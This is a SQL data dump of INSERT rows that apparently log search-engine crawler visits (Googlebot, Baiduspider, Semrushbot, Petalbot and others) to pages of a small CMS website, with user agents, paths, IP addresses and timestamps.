INSERT INTO `ey_weapp_spider_visit` VALUES ('97787', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/248.html', '66.249.79.112', '1661893119', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97840', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/126.html', '66.249.79.110', '1661909386', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97786', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/410.html', '66.249.79.108', '1661893011', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97825', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/list_3_66/', '185.191.171.16', '1661901755', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97886', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/yqal/', '66.249.79.110', '1661930995', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97839', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/products/13.html', '116.179.32.163', '1661909016', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97829', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/list_3_17/', '185.191.171.40', '1661904904', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97858', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/132.html', '185.191.171.22', '1661913090', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97860', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/2_8.html', '185.191.171.18', '1661913383', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97888', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/344.html', '66.249.79.112', '1661931370', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97863', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/tags/20_3.html', '66.249.79.110', '1661917677', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97884', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/25_7.html', '185.191.171.23', '1661930190', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97866', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/358.html', '220.181.108.149', '1661918833', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97887', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/496.html', '66.249.79.112', '1661931245', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97867', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/case/57.html', '66.249.79.108', '1661918914', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97869', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/137.html', '185.191.171.12', '1661919885', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97870', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/223.html', '220.181.108.105', '1661921288', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97871', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/252.html', '66.249.79.108', '1661922296', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97873', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/248.html', '66.249.79.108', '1661922538', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97881', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/case/54.html', '185.191.171.15', '1661928667', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97875', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/10_4.html', '185.191.171.14', '1661925907', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97880', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/list_3_41/', '66.249.79.110', '1661927887', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97877', '6', 'mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', '/', '40.77.167.5', '1661926194', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97895', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/147.html', '66.249.79.110', '1661936110', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97893', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/423.html', '114.119.151.153', '1661935658', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97892', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/', '220.181.108.103', '1661934321', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97894', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/494.html', '66.249.79.108', '1661936108', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97903', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/100.html', '66.249.79.108', '1661938670', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97913', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/496.html', '66.249.79.108', '1661942794', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97907', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/list_3_8', '114.119.151.155', '1661940507', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97915', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/380.html', '114.119.151.153', '1661942836', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97930', '2', 'baiduspider', '/', '43.138.41.187', '1661948802', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97933', '4', 'mozilla/5.0 (iphone; cpu iphone os 11_0 like mac os x) applewebkit/604.1.34 (khtml, like gecko) version/11.0 mobile/15a5341f safari/604.1;360spider', '/news/165.html', '42.236.10.73', '1661950166', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98048', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/311.html', '114.119.151.155', '1662012837', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97935', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/97.html', '185.191.171.4', '1661952742', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98417', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/bljxw/list_18_7/', '162.55.86.60', '1662194574', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98419', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/case/54.html', '162.55.86.60', '1662194683', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97947', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/81.html', '66.249.79.112', '1661959034', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97938', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/122.html', '66.249.79.110', '1661956215', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97943', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/jbJxw/', '185.191.171.21', '1661957503', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97948', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/', '116.179.32.228', '1661959041', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98042', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/hebei.html', '114.119.151.155', '1662011992', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98041', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/case/64.html', '114.119.151.153', '1662011822', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97972', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/', '69.14.27.140', '1661973764', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97960', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/products/79.html', '220.181.108.93', '1661967037', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98014', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/24.html?tagid=24', '185.191.171.2', '1662002188', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98104', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/', '66.249.79.110', '1662042714', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98244', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/99.html', '116.179.32.145', '1662104492', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98083', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/jiaruwomen/', '114.119.151.153', '1662037061', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98082', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/buliaoji/', '185.191.171.43', '1662036625', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98081', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/tags/30.html', '66.249.79.112', '1662036328', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98080', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/264.html', '66.249.79.110', '1662036119', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98078', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/226.html', '116.179.32.154', '1662035764', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98077', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/345.html', '114.119.151.155', '1662035185', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98076', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/345.html', '185.191.171.33', '1662035028', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98064', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/133.html', '185.191.171.34', '1662031293', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98071', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/312.html', '66.249.79.108', '1662034510', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98095', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/392.html', '114.119.151.155', '1662041090', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98068', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/tags/173.html', '66.249.79.108', '1662034183', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98074', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/contact/', '66.249.79.108', '1662034835', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98088', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/91.html', '185.191.171.10', '1662038751', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98079', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/17.html', '66.249.79.112', '1662035936', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98084', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/case/57.html', '185.191.171.3', '1662037104', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98089', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/news/499.html', '216.244.66.194', '1662039374', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98094', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/213.html', '114.119.151.155', '1662040766', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98096', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/25_10.html', '185.191.171.4', '1662041199', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98121', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/list_3_59/', '66.249.79.108', '1662048848', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98127', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/274.html', '185.191.171.12', '1662052657', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98136', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/459.html', '66.249.79.108', '1662055711', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98143', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/tags/222.html', '66.249.79.112', '1662062059', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98197', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/406.html', '185.191.171.2', '1662081089', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98237', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/290.html', '66.249.79.110', '1662097124', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98239', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/289.html', '66.249.79.110', '1662097862', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98208', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/143.html', '66.249.79.110', '1662086767', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98209', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/495.html', '66.249.79.112', '1662087306', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98215', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/286.html', '185.191.171.41', '1662093479', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98347', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/488.html', '185.191.171.38', '1662157056', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98563', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/', '116.179.32.114', '1662219040', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98570', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/news/286.html', '216.244.66.194', '1662222630', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98581', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/172.html', '66.249.79.110', '1662234767', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98603', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/lys.html', '114.119.151.155', '1662246579', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98595', '3', 'sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', '/', '61.135.159.121', '1662243626', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98606', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/96.html', '116.179.32.156', '1662247707', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98612', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/contact', '116.179.32.17', '1662251555', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98618', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/365.html', '114.119.151.155', '1662253344', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98615', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/178.html', '66.249.79.112', '1662252707', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98621', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/435.html', '66.249.79.108', '1662254471', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98628', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/344.html', '66.249.79.112', '1662256615', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98636', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/427.html', '185.191.171.42', '1662261670', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98664', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/list_3_5', '114.119.151.153', '1662275510', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98665', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/363.html', '114.119.151.153', '1662278951', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98668', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/336.html', '66.249.79.112', '1662281599', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98811', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/', '175.182.9.124', '1662357517', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98670', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/479.html', '66.249.79.112', '1662283649', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98673', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/city/nantongshi.html', '220.181.108.178', '1662285397', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98699', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/list_3_69/', '66.249.79.112', '1662303618', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98689', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/105.0.5195.102 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/484.html', '66.249.79.108', '1662297800', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98697', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/81.html', '66.249.79.112', '1662302560', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98696', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/case/list_4_3/', '66.249.79.110', '1662301121', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98706', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/65.html', '185.191.171.5', '1662306108', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94389', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/200.html', '185.191.171.41', '1660252056', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94394', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/', '23.231.76.242', '1660257118', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94388', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tuobengal/', '220.181.108.156', '1660250908', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94353', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/290.html', '66.249.79.108', '1660219999', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98885', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/132.html', '114.119.151.155', '1662413414', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94346', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/news/447.html', '216.244.66.194', '1660216865', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94352', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/1_10.html', '185.191.171.10', '1660219993', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94343', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/31_7.html', '116.179.32.72', '1660214900', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98898', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/245.html', '114.119.151.155', '1662415828', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94277', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/441.html', '114.119.151.153', '1660176876', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98900', '3', 'sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', '/', '58.250.125.174', '1662416848', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94275', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/463.html', '185.191.171.38', '1660176822', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94274', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/316.html', '66.249.79.108', '1660176638', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98903', '3', 'sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', '/', '49.7.21.81', '1662419534', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98905', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/102.html', '220.181.108.104', '1662422865', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94242', '6', 'mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', '/', '157.55.39.41', '1660163659', '0');
